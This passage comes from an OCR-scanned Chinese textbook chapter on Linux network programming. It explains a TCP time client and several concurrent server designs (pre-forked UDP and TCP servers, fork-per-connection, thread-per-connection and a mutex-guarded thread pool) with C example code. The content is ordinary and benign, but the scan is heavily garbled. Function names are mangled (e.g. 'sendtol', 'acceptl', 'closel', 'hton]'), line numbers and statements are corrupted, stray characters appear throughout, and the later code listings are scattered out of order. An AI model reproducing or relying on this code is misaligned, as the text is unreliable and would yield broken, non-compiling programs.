server.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 

/* 连 接 服务 器 */ 

connect(s, (struct sockaddr*) &gserver,sizeof (server)); 
memset (buff, 0, BUFFLEN); /* 清 零 */ 

strcpy (buff, "TIME"); /* 复 制 发 送 字 符 串 */ 
/* 发 送 数 据 */ 

send(s, buff, strlen(buff), 0); 

memset (buff, 0, BUFFLEN); /* 清 零 */ 

/* 接 收 数据 */ 

n= recv(s, buff, BUFFLEN, 0); 

/* 打 印 消息 */ 

if(n >0){ 


printf ("TIME:%s",buff); 
close(s) 


return 0; 


与 UDP 相 比 ，TCP 增加 了 一 个 连接 的 过 程 (connect)， 接 着 将 TIME 字符 串 复制 到 一 


个 缓冲 区 中 ， 作 为 请 求 的 数据 发 送 到 服务 器 端 ， 请 求 服务 器 的 时 间 。 然 后 等 待 服 务 器 端的 
响应 ， 接 收服 务 器 端 发 送 过 来 的 时 间 数据 ， 并 将 信息 打印 出 来 。 最 后 关闭 套 接 字 连 接 ， 退 
出 程序 。 


14.2 ”简单 并 发 服务 器 


与 循环 服务 器 的 串 行 处 理 不 同 ， 并 发 服务 器 对 客户 端的 服务 请 求 进行 并 发 处 理 。 例 如 


多 个 客户 端 同时 发 送 请 求 的话 ， 服 务 器 可 以 同时 进行 处 理 ， 而 不 像 循 环 服务 器 那样 处 理 完 
一 个 客户 端的 请 求 后 再 处 理 另 一 个 请 求 。 
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14.2.1 并 发 服务 器 的 模型 


简单 的 并 发 服务 器 模型 如 图 14.3 所 示 。 在 服务 器 端 ， 主 程序 提前 构建 多 个 子 进 程 ， 当 
客户 端的 请 求 到 来 的 时 候 ， 系 统 从 进程 池 中 选取 一 个 子 进 程 处 理 客户 端的 连接 ， 每 个 子 进 
程 处 理 一 个 客户 端的 请 求 ， 在 全 部 子 进程 的 处 理 能 力 得 到 满足 之 前 ， 服 务 器 的 网 络 负载 是 
基本 不 变 的 。 


服务 器 端 
进程 池 
客户 端 ! = 子 进程 1 Ps 
客户 端 2 ~ 子 进程 2 
父 进程 
子 进程 3 


子 进程 n 1 


图 14.3 简单 并 发 服务 器 的 模型 


客户 端 连接 之 前 已 经 构造 好 了 ， 不 能 进行 扩展 。 利 用 可 动态 增加 的 子 进程 与 事先 分 配 好 子 
进程 相 结 合 的 方法 是 常用 服务 器 中 的 基本 策略 。 例 如 Apache 的 Web 服务 器 就 是 实现 分 配 
与 动态 分 配 相 结合 的 办 法 。 


14.2.2 UDP 并 发 服务 器 
上 述 并 发 服务 器 模型 在 UDP 协议 的 实现 模式 ， 如 图 14.4 所 示 。 
1. UDP 并 发 服务 器 介绍 


在 建立 套 接 字 文 件 描述 符 后 ， 对 描述 符 和 本 地 的 地 址 端口 进行 绑 定 。 然 后 fork() 多 个 
子 进程 ， 客 户 端 请 求 的 处 理 在 子 进程 中 进行 。 

例如 ， 当 客户 端 0 发 送 请 求 的 时 候 ， 某 个 子 进程 对 此 请 求 进行 处 理 ， 此 时 当 客 户 端 1 
的 请 求 到 来 时 ， 另 一 个 子 进程 对 此 客户 端 进行 处 理 。 

2. UDP 并 发 服务 器 的 例子 


下 面 为 14.1.1 节 中 的 循环 服务 器 进行 修改 后 的 代码 ， 对 于 客户 端的 请 求 ， 有 多 个 子 进 
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开始 
了 
socket() 客户 端 1 客户 端 2 
了 
bind() 
服务 器 子 进程 服务 器 子 进程 服务 器 子 进程 
1 了 1 
fork() recv() recv() recv() 
1 . 1 
父 进 程 等 待 处 理 数据 处 理 数据 处 理 数据 
结束 


图 14.4 UDP 协议 的 简单 并 发 服务 器 


程 进 行 处 理 。 与 循环 服务 器 相 比较 ， 并 发 的 UDP 程序 ， 在 处 理 客户 端 请 求 的 时 候 , 不 再 简 
单 地 使 用 一 个 while 进行 客户 端 请 求 的 串 行 处 理 ， 而 是 fork 一 个 进程 ， 将 客户 端的 请 求 放 
到 一 个 进程 中 进行 处 理 。 

函数 handle_connect() 是 进行 客户 端 请 求 的 主要 实现 ， 它 先 接 受 客户 端的 请 求 数据 ， 对 
请 求 数据 进行 分 析 是 否 合法 后 〈 判 断 是 否 含有 TIME 关键 字 )， 获 得 当前 的 时 间 , 将 时 间 数 
据 填 入 发 送 缓冲 区 发 送 给 请 求 的 客户 端 。 然 后 再 等 待 下 一 个 请 求 。 并 发 服务 器 的 实现 代码 
中 使 用 了 多 个 服务 器 处 理 进程 来 处 理 客户 端 的 请 求 ， 这 能 够 很 大 程序 上 提高 服务 器 的 处 理 
能 力 ， 例 如 本 例 代码 中 先 建立 PIDNUMB 个 进程 进行 并 行 处 理 客 户 端 的 请 求 。 代 码 如 下 : 


01 #include <sys/types.h> 

02 #include <sys/socket.h> 

03 #include <netinet/in.h> 

04 #include <time.h> 

05 #include <string.h> 

06 #include <stdio.h> 

07 #include <unistd.h> 

08 #include <stdlib.h> 

09 #include <signal.h> 

10 #define BUFFLEN 1024 

11 #define SERVER PORT 8888 

12 #define BACKLOG 5 

13 #define PIDNUMB 2 

14 static void handle connect (int s) 
15 

16 struct sockaddr in from; /* 客 户 端 地 址 */ 
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下 了 socklen 七 len = sizeof (from); 

18 nt n = 0; 

19 char buff[BUFFLEN]; 

20 time t now; /* 时 间 */ 

lb 

2 /* 主 处 理 过 程 */ 

23 while (1) 

24 

25 memset (buff, 0, BUFFLEN); /* 清 零 */ 

26 /* 接 收 客户 端 连接 */ 

27 n= recvfrom(s, buff, BUFFLEN, 0, (struct sockaddr*) gfrom, &len); 
28 /* 接 收发 送 方 数 据 */ 

29 if(n > 0 && !strncmp (buff，"TIME"，4))  /* 判 断 是 否 合法 接收 数据 
作风 

30 { 

31 memset (buff, 0, BUFFLEN); /* 清 零 */ 

32 now = time (NULL); /* 当 前 时 间 */ 

33 sprintf (buff, "%24s\r\n",ctime (&now) ) ; /* 将 时 间 复 制 入 缓冲 区 */ 
34 sendtol(s, buff, strlen (buff),0, (struct sockaddr*)&from, 
len); /* 发 送 数 据 */ 

35 } 

36 } 

3 

38 void sig int(int num) /*SIGINT 信号 处 理 函 数 */ 
S39 湛 

40 exit (1); 

41 } 

42 int main(int argc, char *argv[]) 

43 { 

44 SEE /* 服 务 器 套 接 字 文件 描述 符 */ 
45 struct sockaddr in local; /* 本 地 地 址 */ 

46 

47 signal (SIGINT, sig int); 

48 /* 建 立 TCP 套 接 字 */ 

49 ss = socket(AF INET, SOCK DGRAM, 0); 

50 

Bi /* 初 始 化 地 址 */ 

52 memset (&local, 0, sizeof (local)); /* 清 零 */ 

53 local.sin family = AF_INET; /*AF_INET 协议 族 */ 

54 local.sin addr.s_ addr = hton] (INADDR ANY); /* 任 意 本 地 地 址 */ 

55 local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 

56 

5 /* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 

58 bind(s_s， (struct sockaddr*)&local, sizeof (local)); 

59 

60 /* 处 理 客户 端 连接 */ 

61 pid t pid[PIDNUMB]; 

62 int 1 =03 

63 for (i=0;i<PIDNUMB; i++) 

64 { 

65 pid[i] = fork(); 

66 EPL == Oh 村 和 

67 { 

68 handle connect(s s); 

69 } 

70 } 

A while(1); 

治之 
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73 return 0; 
va 


为 了 方便 退出 ， 程 序 中 对 信号 SIGINT 进行 了 处 理 ， 此 时 所 有 的 进程 都 会 退出 。 此 程 
序 的 客户 端 与 14.1.2 节 中 的 一 致 。 
14.2.3 TCP 并 发 服务 器 


简单 并 发 服务 器 的 TCP 模型 相 比 较 UDP 协议 的 并 发 服务 器 ，TCP 协议 的 并 发 服务 器 
的 主 处 理 过 程 中 多 了 一 个 accept 的 过 程 ， 服 务 器 在 此 处 等 待 客户 端的 连接 ， 由 于 acceptO 
函数 为 阻塞 函数 ， 所 以 通常 情况 下 ,服务 器 会 在 此 处 等 待 。 对 accept() 函 数 的 不 同 处 理 是 区 
别 各 种 服务 器 类 型 的 一 个 重要 依据 。 


1. TCP 并 发 服务 器 介绍 


TCP 协议 的 并 发 服务 器 处 理 过 程 如 图 14.5 所 示 。TCP 服务 器 使 用 socket() 函 数 建立 套 
接 字 文件 描述 符 后 ， 对 地 址 和 套 接 字 文件 描述 符 使 用 bind() 函 数 进行 绑 定 ， 使 用 listen() 函 


数 设 定 侦 听 的 队列 长 度 ， 然 后 进入 并 发 服务 器 的 主 处 理 过 程 。 
开始 
socket0 客户 端 1 
1 
bindO) 
用 服务 器 子 进 各 服务 器 子 进程 
1 
fork() pd accept() accept() | 一 | accept() 
| | | | 
父 进程 等 竺 recv0 reev0 wood) 
1 | 1 
结束 处 理 数据 处 理 数据 [| 。 处 理 数据 


图 14.5 简单 并 发 服务 器 的 TCP 模型 


TCP 协议 的 并 发 服务 器 的 主 处 理 过 程 主要 由 acceptO) 函 数 、recv(0) 函 数 和 数据 处 理 过 程 
组 成 。 当 客户 端的 连接 connectO 到 来 时 ，acceptO 返 回 客户 端的 主要 连接 信息 ， 此 时 服务 器 
可 以 进行 数据 的 接收 ， 或 者 直接 发 送 数据 给 客户 端 。 当 需要 接收 客户 端的 数据 时 ， 需 要 对 
数据 进行 处 理 ， 然 后 判定 下 一 步 服 务 器 的 处 理 方法 和 响应 数据 。 
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2. TCP 并 发 服务 器 的 例子 


TCP 并 发 服务 器 的 代码 如 下 ， 在 处 理 客户 端 请 求 之 前 ， 程 序 先 分 又 了 3 个 子 进程 ， 对 
应 多 个 客户 端的 请 求 ， 由 多 个 子 进 程 进行 处 理 。 

与 循环 服务 器 相 比 较 ， 并 发 的 TCP 程序 ， 在 处 理 客户 端 请求 的 时 候 , 不 再 简单 地 使 用 
一 个 while 进行 客户 端 请 求 的 串 行 处 理 ， 而 是 fork() 一 个 进程 ， 将 客户 端的 请 求 放 到 一 个 进 
程 中 进行 处 理 。 

handle_ connect() 函 数 是 进行 客户 端 请 求 的 主要 实现 ， 它 先 接受 客户 端的 请 求 数据 ， 对 

请 求 数据 进行 分 析 判 断 是 否 合法 后 〈 判 断 是 否 含有 TIME 关键 字 )， 获 得 当前 的 时 间 ， 将 时 
间 数 据 填 入 发 送 缓冲 区 发 送 给 请 求 的 客户 端 。 然 后 再 等 待 下 一 个 请 求 。 
并 发 服务 器 的 实现 代码 中 使 用 了 多 个 服务 器 处 理 进程 来 处 理 客户 端的 请 求 ， 这 能 够 提 
高 服务 器 的 处 理 能 力 ， 例 如 本 例 代 码 中 先 建 立 PIDNUMB 个 进程 进行 并 行 处 理 客户 端的 请 
求 。 在 主 处 理 函数 handle_connect() 中 ， 每 次 客户 端 请 求 的 并 发 服务 器 处 理 包含 了 接受 客户 
端 连接 accept0、 接 受 客户 端 请 求 的 信息 recv()、 对 请 求 信息 的 判断 、 发 送 客 户 端 请 求 的 响 
应 send()、 关 闭 客户 端 连接 的 过 程 。 

01 #include <sys/types.h> 

02 #include <sys/socket.h> 

03 #include <netinet/in.h> 

04 #include <time.h> 

05 #include <string.h> 

06 #include <unistd.h> 

07 #include <stdlib.h> 

08 #include <stdio.h> 

09 #include <signal.h> 

10 #define BUFFLEN 1024 

11 #define SERVER PORT 8888 

12 #define BACKLOG 5 


13 #define PIDNUMB 3 
14 static void handle connect(int s s) 


E50 

16 nnE Se /* 客 户 端 套 接 字 文件 描述 符 */ 
ly struct sockaddr in from; /* 客 户 端 地 址 */ 

18 socklen t len = sizeof (from); 

19 

20 /* 主 处 理 过 程 */ 

2 while(1) 

22 { 

23 /* 接 收 客户 端 连接 */ 

24 Ss_C = acceptl(s s, (struct Sockaddr*)&from，&len)， 

25 time 七 now; /* 时 间 */ 

26 char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 

El int n= 0; 

28 memset (buff, 0, BUFFLEN); /* 清 零 */ 

29 n= recv(s c, buff, BUFFLEN,0); /* 接 收发 送 方 数据 */ 

30 if(n > 0 && !strncmp (buff，"TIME"，4)) /* 判 断 是 否 合法 接收 数据 */ 
31 { 

32 memset (buff, 0, BUFFLEN); /* 清 零 */ 

33 now = time (NULL); /* 当 前 时 间 */ 

34 sprintf (buff, "%24s\r\n",ctime (gnow) ) ; /* 将 时 间 复 制 入 缓冲 区 */ 
35 send(s_c，buff，strlen (buff) ,0) ; ”/* 发 送 数 据 */ 
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36 } 

3 /* 关 闭 客户 端 */ 

38 Close(s c); 

39 } 

40 

41 1} 

42 void sig int(int num) 

43 江 

44 exit (1); 

45 } 

46 int main(int argc, char *argv[]) 

了 

48 nes /* 服 务 器 套 接 字 文件 描述 符 */ 
49 struct sockaddr in local; /* 本 地 地 址 */ 

50 signal (SIGINT, sig int); 

SL 

52 /* 建 立 TCP 套 接 字 */ 

53 ss= socket(AF INET, SOCK STREAM, 0); 

54 

55 /* 初 始 化 地 址 和 端口 */ 

56 memset (&local, 0, sizeof (local)); /* 清 零 */ 
57 local.sin family = AF INET; /*AF INET 协议 族 */ 
58 local.sin addr.s addr = htonl (INADDR ANY); /* 任 意 本 地 地 址 */ 
59 local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 
60 

61 /* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 

62 bindl(s s, (struct sockaddr*) &local, sizeof (local)); 

63 listen(s_s, BACKLOG); /* 侦 听 */ 
64 

65 /* 处 理 客户 端 连接 */ 

66 pid t pid[PIDNUMB]; 

67 int i =0; 

68 for (i=0;i<PIDNUMB;i++) 

69 { 

70 Pid[i] = fork(); 

5 if(Pid[i] == 0) /* 子 进程 */ 
72 { 

73 handle connect(s s); 

74 } 

75 } 

76 while(1); 

Wad 

78 closel(s s); 

79 

80 return 0; 

|: 


为 了 方便 退出 ， 程 序 中 对 信号 SIGINT 进行 了 处 理 ， 此 时 所 有 的 进程 都 会 退出 。 此 程 
序 的 客户 端 与 14.1.2 节 中 的 一 致 。 


14.3 ”TCP 的 高 级 并 发 服务 器 模型 
在 14.2 节 中 介绍 的 是 一 个 简单 的 TCP 并 发 服务 器 模型 ， 实 际 的 TCP 并 发 服务 器 模型 


有 很 多 。 本 节 将 介绍 按照 accept0 分 类 的 多 进程 和 多 线程 并 发 服务 器 的 模型 和 程序 设计 
框架 。 
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14.3.1 单 客户 端 单 进程 ， 统 一 accept() 


在 14.2 节 中 介绍 了 简单 的 并 发 服务 器 模型 , 模型 中 服务 器 在 客户 端 到 来 之 前 就 预 分 又 
了 多 个 子 进程 用 于 处 理 客 户 端的 连接 请 求 。 


1. 原型 介绍 


本 节 中 介绍 的 并 发 服务 器 模型 并 不 预先 分 又 进程 ， 而 是 由 主 进程 统一 处 理 客户 端的 连 
接 ， 当 客户 端的 连接 请 求 到 来 时 ， 才 临时 fork0O 进 程 ， 由 子 进程 处 理 客户 端的 请 求 。 这 种 
模型 将 客户 端的 连接 请 求 和 业务 处 理 进行 了 分 离 ， 相 比较 来 说 条 理 更 清晰 。 

如 图 14.6 所 示 , 主 进程 调用 函数 socket() 建 立 套 接 字 文 件 描述 符 , 调用 函数 bind() 绑 定 
地 址 ， 调 用 listen() 来 设 定 侦 听 的 队列 长 度 。 然 后 主 进 程 进入 主 处 理 过 程 ， 等 待 客 户 端 连接 
的 到 来 。 当 客户 端的 连接 请 求 到 来 时 ， 服 务 器 的 accept() 函 数 成 功 返 回 ,此 时 服务 器 端 进行 
进程 分 又 ， 父 进程 继续 等 待 客户 端的 连接 请 求 ， 而 子 进程 则 处 理 客 户 端的 业务 请 求 ， 接 收 
客户 端的 数据 ， 分 析 数 据 并 返回 结果 。 


ptO) 


服务 器 子 进程 


服务 器 子 进程 


图 14.6 单 客户 端 单 进程 ， 统 一 accept 的 并 发 服务 器 模型 
2. 例子 代码 
这 种 模型 的 实例 代码 如 下 ， 客 户 端 与 之 前 的 TCP 客户 端 一 致 。 
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TCP 并 发 服务 器 ， 在 处 理 客户 端 请 求 之 前 ， 程 序 先 分 又 了 3 个 子 进程 ， 对 于 多 个 客户 
端的 请 求 ， 由 多 个 子 进程 进行 处 理 。 与 循环 服务 器 相 比较 ， 并 发 的 TCP 程序 ， 在 处 理 客户 
端 请 求 时 ， 不 再 简单 地 使 用 一 个 while 进行 客户 端 请 求 的 串 行 处 理 。 

并 发 服务 器 fork 一 个 进程 ， 将 客户 端的 请 求 放 到 一 个 进程 中 进行 处 理 。 函 数 
handle_connect() 是 进行 客户 端 请 求 的 主要 实现 ， 它 先 接受 客户 端的 请 求 数据 ， 对 请 求 数据 
进行 分 析 是 否 合法 后 (判断 是 否 含 有 TIME 关键 字 )， 获 得 当前 的 时 间 , 将 时 间 数 据 填 入 发 
送 缓冲 区 发 送 给 请 求 的 客户 端 ， 然 后 等 待 下 一 个 请 求 。 并 发 服务 器 的 实现 代码 中 使 用 了 多 
个 服务 器 处 理 进程 来 处 理 客户 端的 请 求 ， 这 能 够 很 大 程度 地 提高 服务 器 的 处 理 能 力 ， 例 如 
本 例 代码 中 先 建 立 PIDNUMB 个 进程 进行 并 行 处 理 客户 端的 请 求 。 

在 主 处 理 函 数 handle_connect() 中 ,与 14.2.3 节 中 的 例子 不 同 ,每 次 客户 端 请 求 的 并 发 
服务 器 处 理 包 含 了 接受 客户 端 请 求 的 信息 recev、 对 请 求 信息 的 判断 、 发 送 客 户 端 请 求 的 响 
应 send、 关 闭 客户 端 连接 的 过 程 ， 接 受 客户 端 连接 accept 作为 一 个 过 程 由 主 程序 进行 统一 
处 理 。 这 样 ， 程 序 从 总 体 上 看 是 一 个 任务 分 配 的 过 程 : 主 程序 接受 任务 并 进行 任务 分 发 ， 
fork 出 来 的 进程 处 理 主 程序 分 发 来 的 客户 端 请 求 任务 并 进行 处 理 和 响应 ， 最 后 的 连接 关闭 
在 处 理 程序 中 进行 。 

#include <sys/types.h> 

#include <sys/socket.h> 

#include <netinet/in.h> 

#include <time.h> 

#include <string.h> 

#include <unistd.h> 

#include <stdio.h> 

#define BUFFLEN 1024 


#define SERVER PORT 8888 
#define BACKLOG 5 


(1) 处 理 客户 端 请 求 handle_request()。handle_request() 函 数 接收 客户 端的 数据 与 字符 
串 TIME 比较 是 否 匹 配 来 判定 是 否 为 合法 的 客户 端 ， 如 果 合法 则 将 本 地 的 时 间 发 送 给 客 
户 端 。 


static void handle request(int s c) 
‘ 


time t now; /* 时 间 */ 
char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 
int n= 0; 
memset (buff, 0, BUFFLEN); /* 清 零 */ 
n = recv(s c, buff, BUFFLEN,0); /* 接 收发 送 方 数据 */ 
if(n > 0 && !strncmp (buff, "TIME", 4)) /* 判 断 是 否 合 法 接收 数据 */ 
{ 
memset (buff, 0, BUFFLEN); /* 清 零 */ 
now = time (NULL); /* 当 前 时 间 */ 
sprintf (buff, "%24s\r\n",ctime (&now) ) ; /* 将 时 间 复 制 入 缓冲 区 */ 
sendl(s c, buff, strlen (buff),0); /* 发 送 数 据 */ 
} 
/* 关 闭 客 户 端 */ 
closel(s c); 


} 
(2) 处 理 客 户 端 连接 handle_connect()。 每 个 客户 端的 连接 到 来 时 ，handle_connect() 函 
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数 都 fork 一 个 进程 来 处 理 这 个 客户 端 相关 的 请 求 。 
static int handle_connect(int s_s) 
{ 
int 3 Cr 


struct sockaddr in from; 
socklen t len = sizeof (from); 


户 层 网 络 编程 


/* 客 户 端 套 接 字 文件 描述 符 */ 
/* 客 户 端 地 址 */ 


/* 主 处 理 过 程 */ 
while(1) 
Li 
/* 接 收 客户 端 连接 */ 
sc = accept(s s, (struct sockaddr*) gfrom, &len); 
a > 0 /* 客 户 端 成 功 连接 */ 
/* 创 建 进程 进行 数据 处 理 */ 
if(fork() > 0){ /* 父 进程 */ 
closel(s c); /* 关 闭 父 进程 的 客户 端 连 接 套 接 字 */ 
}else{ 
handle request(s c); /* 处 理 连 接 请 求 */ 


return(0); 


} 
(3) 主 函 数 main()。 


int main(int argc, char *argv[]) 
{ 

int s s; 

struct sockaddr in local; 


/* 建 立 TCP 套 接 字 */ 


ss= socketl(AF INET, SOCK STREAM, 0); 


/* 初 始 化 地 址 */ 

memset (&local, 0, sizeof (local)); 
local.sin family = AF_INET; 

local.sin addr.s addr = htonl (INADDR ANY); 
local.sin port = htons (SERVER PORT); 


/* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 
bind(s_s， 
listen(s_s, BACKLOG); 


/* 处 理 客户 端 连接 */ 


handle connect(s s); 
closel(s_s); 


return 0; 
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让 函数 main() 相 对 比较 简单 ， 在 构建 完毕 套 接 字 并 进行 了 必要 的 
设置 工作 后 ， 调 用 handle_connect0) 函 数 侦 听 客户 端的 连接 。 


/* 服 务 器 套 接 字 文 件 描述 符 */ 
/* 本 地 地 址 */ 


/* 清 零 */ 
/*AF_INET 协议 族 */ 
/* 任 意 本 地 地 址 */ 
/* 服 务 器 端口 */ 


(struct sockaddr*) &glocal, sizeof (local)); 


/* 侦 听 */ 
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14.3.2 单 客 户 端 单线 程 ， 统 一 accept() 


与 进程 相 比 较 , 线程 有 很 多 优点 ,如 速度 快 、 占 用 资源 少 、 数 据 可 以 共享 等 。 如 图 14.7 
所 示 为 单 客户 端 单线 程 ， 统 一 accept0 的 TCP 并 发 服务 器 模型 。 


开始 
. 
socket() 
1 
bind() 
客户 端 0 客户 端 1 
Y 
listen() 
1 
accept() 
业务 处 理 线程 业务 处 理 线程 
pthread_create recv() recv() 
处 理 数据 处 理 数据 
结束 


图 14.7 单 客户 端 单线 程 ， 统 一 accept0 的 TCP 并 发 服务 器 模型 


使 用 线程 的 并 发 服务 器 与 之 前 使 用 进程 的 服务 器 的 主要 过 程 是 一 致 的 。 

与 循环 服务 器 相 比 较 , 并 发 的 TCP 程序 在 处 理 客户 端 请求 的 时 候 , 不 再 简单 地 使 用 一 
个 while 进行 客户 端 请 求 的 串 行 处 理 。 并 发 服务 器 会 调用 fork() 分 叉 一 个 进程 ,将 客户 端的 
请 求 放 到 一 个 进程 中 进行 处 理 。 

handle_ connect(O) 函 数 是 进行 客户 端 请 求 的 主要 实现 ， 它 先 接受 客户 端的 请 求 数据 ， 对 
请 求 数据 进行 分 析 是 否 合 法 后 (判断 是 否 含 有 TIME 关键 字 )， 获 得 当前 的 时 间 , 将 时 间 数 
据 填 入 发 送 缓冲 区 发 送 给 请 求 的 客户 端 。 然 后 再 等 待 下 一 个 请 求 。 并 发 服务 器 的 实现 代码 
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中 使 用 了 多 个 服务 器 处 理 进程 来 处 理 客户 端的 请 求 ， 这 能 够 在 很 大 程度 上 提高 服务 器 的 处 
理 能 力 ， 例 如 本 例 代码 中 先 建立 PIDNUMB 个 进程 进行 并 行 处 理 客户 端的 请 求 。 

在 主 处 理 函 数 handle_ connect0) 中 ,与 14.2.3 节 中 的 例子 不 同 ， 每 次 客户 端 请 求 的 并 发 
服务 器 处 理 包含 了 接受 客户 端 请 求 的 信息 recv()、 对 请 求 信息 的 判断 、 发 送 客户 端 请 求 的 
响应 send()、 关 闭 客户 端 连接 的 过 程 ; 接受 客户 端 连接 accept0 作 为 一 个 过 程 由 主 程序 进行 


统一 处 理 ， 这 样 ， 程 序 从 总 体 上 看 是 一 个 各 


E 务 分 配 的 过 程 : 主 程序 接受 任务 并 进行 任务 分 


发 ，fork 出 来 的 进程 处 理 主 程序 分 发 来 的 客户 端 请 求 任务 并 进行 处 理 和 响应 ， 最 后 的 连接 
关闭 在 处 理 程序 中 进行 。 

同 多 进程 的 服务 器 处 理 方法 不 同 ， 多 线程 进程 处 理 的 过 程 是 使 用 多 个 线程 对 客户 端的 
连接 请 求 进行 处 理 。 


本 例 在 一 个 主 处 理 程序 中 ， 接 受 客户 端的 连接 ， 当 客户 端 连接 到 来 的 时 候 ， 使 用 
pthread_create() 函数 建立 一 个 线程 进行 客户 端 请 求 的 处 理 ， 线 程 的 处 理 函 数 叫 做 


handle request0)， 它 的 输入 参数 是 客户 端 连 


接 的 套 接 字 描述 符 ， 在 这 个 线程 处 理 函数 中 对 


用 户 的 请 求 数据 进行 接收 、 分 析 、 判 断 合法 性 ， 然 后 获得 本 机 的 时 间 值 并 将 时 间 发 送 给 客 
户 端 ， 线 程 在 处 理 完 客户 端的 请 求 后 关闭 客户 端的 连接 。 其 代码 如 下 : 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
Ll 
站 这 
3 
14 
5 
16 
1 
18 
二 9 
20 
2 出 
22 


#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <time.h> 
#include <string.h> 
#include <stdio.h> 
#include <unistd.h> 
#include <pthread.h> 
#define BUFFLEN 1024 
#define SERVER PORT 8888 
#define BACKLOG 5 


static void handle request (void *argv) 


{ 


} 


static void handle_connect (int s_s) 


{ 


int s c = *((int*)argv); 
time t now; 

char buff [BUFFLEN]; 

int n = 0; 


memset (buff, 0, BUFFLEN); 
n= recv(s c, buff, BUFFLEN,0); 
if(n > 0 && !strncmp (buff, 


' 


memset (buff, 0, BUFFLEN); 


now = time (NULL); 


sprintf (buff, "“%24s\r\n",ctime(&now)); 
sendl(s_c, buff, strlen(buff),0); 


} 
/* 关 闭 客户 端 */ 


closel(s c); 


AnE SC 
struct sockaddr in from; 


socklen t len = sizeof (from); 


/* 时 间 */ 
/* 收 发 数据 缓冲 区 */ 


/* 清 零 */ 
/* 接 收发 送 方 数据 */ 
/* 判 断 是 否 合法 接收 数据 */ 


/* 清 零 */ 

/* 当 前 时 间 */ 

/* 将 时 间 复 制 入 缓冲 区 */ 
/* 发 送 数 据 */ 


/* 客 户 端 套 接 字 文件 描述 符 */ 
/* 客 户 端 地 址 */ 
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36 pthread t thread do; 

37 

38 /* 主 处 理 过 程 */ 

39 while(1) 

40 

41 /* 接 收 客户 端 连接 */ 

42 Ss c= accept(s_s， (struct sockaddr*)&from，&len) 
43 (SEE 0) /* 客 户 端 成 功 连接 */ 
44 { 

45 /* 创 建 线程 处 理 连接 */ 

46 Pthread create (Sthread do, 

47 NULL, 

48 (void*)handle request, 

49 &s_c); 

50 } 

al } 

S20 

53 int main(int argc, char *argv[]) 

54 { 

55 nt Ss /* 服 务 器 套 接 字 文件 描述 符 */ 
56 struct sockaddr in local; /* 本 地 地 址 */ 
57 

58 /* 建 立 TCP 套 接 字 */ 

59 ss= socket(AF INET, SOCK STREAM, 0); 

60 

61 /* 初 始 化 地 址 和 端口 */ 

62 memset (&local, 0, sizeof (local)); /* 清 零 */ 

63 local.sin family = AF INET; /*AF INET 协议 族 */ 
64 local.sin addr.s_addr = htonl (INADDR_ANY) ; /* 任 意 本 地 地 址 */ 
65 local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 
66 

67 /* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 

68 bind(s_s， (struct sockaddr*)&local, sizeof (local)); 

69 listen(s_s, BACKLOG); /* 侦 听 */ 

70 

yat /* 处 理 客户 端 连接 */ 

72 handle connect(s_s); 

并 

74 closel(s_ s); 

73 

76 return 0; 

WU | | 


14.3.3 ” 单 客户 端 单线 程 ， 各 线程 独自 accept()， 使 用 互 斥 锁 


本 节 将 介绍 的 模型 为 预先 分 配 线程 ， 而 不 是 进程 的 模型 。 在 线程 的 accept0) 函 数 中 ,多 
个 线程 都 可 以 使 用 此 函数 处 理 客户 端的 连接 。 为 了 防止 冲突 ， 使 用 了 线程 互 斥 锁 。 在 调用 
函数 之 前 锁定 ， 调 用 函数 accept(0) 之 后 ， 释 放 锁 。 实 现 框 架 如 图 14.8 所 示 。 
口 首先 要 调用 socket(O) 函 数 建立 一 个 套 接 字 文 件 描述 符 ， 调 用 bind() 函 数 将 套 接 字 文 
件 描述 符 与 本 地 地 址 进行 绑 定 ， 调 用 listen() 函 数 设置 侦 听 的 队列 长 度 。 
口 然后 使 用 pthread_create() 函 数 建立 多 个 线程 组 成 的 线程 池 ， 主 程序 等 待 线程 结束 。 
口 各 个 线程 中 按照 接收 客户 端 连接 accept()、 接 收 数据 recvf) 和 处 理 数 据 发 送 响应 的 
数据 进行 。 为 了 防止 冲突 ， 各 个 线程 在 调用 accept(O) 函 数 的 时 候 ， 要 调用 一 个 线程 
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互 斥 锁 。 
开始 
了 
SY 客户 端 0 客户 端 1 
1 
bindO 
线程 池 
1 
listenO) 业务 处 理 线程 业务 处 理 线程 
[一 | Mutex_lock Mutex_lock 
1 了 了 
ft 
pthread_create() accept() accept() 

了 1 

Mutex_unlock() Mutex_unlock() 
pthread join() ~ 
1 1 
recv() recv() 
结束 
- 1 1 
处 理 数据 处 理 数据 


图 14.8 单 客户 端 单线 程 ， 各 线程 独自 accept 的 TCP 并 发 服务 器 模型 


使 用 线程 的 并 发 服务 器 与 之 前 使 用 进程 服务 器 的 主要 过 程 是 一 致 的 。 与 循环 服务 器 相 
比较 ， 并 发 的 TCP 程序 ， 在 处 理 客户 端 请 求 的 时 候 ， 不 再 简单 地 使 用 一 个 while 进行 客户 
端 请 求 的 串 行 处 理 。 并 发 服务 器 会 调用 fork() 函 数 分 又 一 个 进程 ， 将 客户 端的 请 求 放 到 一 
个 进程 中 进行 处 理 。 

函数 handle_ connect(O) 是 进行 客户 端 请 求 的 主要 实现 ， 它 先 接受 客户 端的 请 求 数据 ， 对 
请 求 数 据 进行 分 析 是 否 合法 后 〈 判 断 是 否 含 有 TIME 关键 字 )， 获 得 当前 的 时 间 , 将 时 间 数 
据 填 入 发 送 缓冲 区 发 送 给 请 求 的 客户 端 。 然 后 再 等 待 下 一 个 请 求 。 并 发 服务 器 的 实现 代码 
中 使 用 了 多 个 服务 器 处 理 进程 来 处 理 客 户 端的 请 求 ， 这 能 够 很 大 程度 地 提高 服务 器 的 处 理 
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能 力 ， 例 如 ， 本 例 代 码 中 先 建立 PIDNUMB 个 进程 进行 并 行 处 理 客户 端的 请 求 。 

在 主 处 理 函数 handle_connect() 中 ,与 14.2.3 节 中 的 例子 不 同 ,每 次 客户 端 请 求 的 并 发 
